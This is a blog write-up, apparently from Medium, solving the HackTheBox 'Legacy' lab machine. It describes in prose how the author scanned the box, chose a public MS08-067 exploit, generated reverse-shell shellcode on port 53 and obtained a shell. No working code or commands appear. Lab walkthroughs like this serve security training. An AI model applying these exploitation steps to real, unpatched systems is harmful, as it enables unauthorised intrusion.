Solving Legacy HackTheBox, MS08–67

MS08–67

This vulnerability in Server Service allows remote code Execution. Windows 2000, XP and Server 2003 Systems were affected.

Recon

Doing a port scan on the box.

From this we can get to know that the system is running Windows XP with name Legacy. From our past experience doing the Blue box, let’s try out a vulnerability scan using NSE.

NSE vulnerability scanning

From the above check it’s pretty clear that the system is vulnerable to MS08–67 and MS17–010 aka EternalBlue.

I will be using the MS08–67 to get access to the box. After a bit of searching found this exploit from jivoi.

Exploit

I cloned the entire repo onto my system and started going through the code. It’s mentioned that the shellcode must be created and replaced in the script, for it to work.

Let’s create the shellcode then!

This basically means we are creating a reverse shell at our local address and at port 53, since the system is a 32bit one we are defining the architecture as x86, and also defining the bad characters \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40.

Now replacing the shellcode in the file with the generated one, our exploit is all set to crack into the machine :)

Setting up a listener at port 53

Running the exploit

Here I have given the target system ip, port and system type as arguments.

Defining the system version is important as the addresses are different for each one. I choose the Universal one first but didn’t get the shell then moved to the XP SP3 English which worked.

Got the shell!!!

If by any chance you are getting any connection errors do check out this form, it helped me out!

Flags

Traversing to the Documents and Settings directory I found the user john and Administrator

Boo Yeah! Solved Legacy :)

--

--

Grad Student. Member Bi0s.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store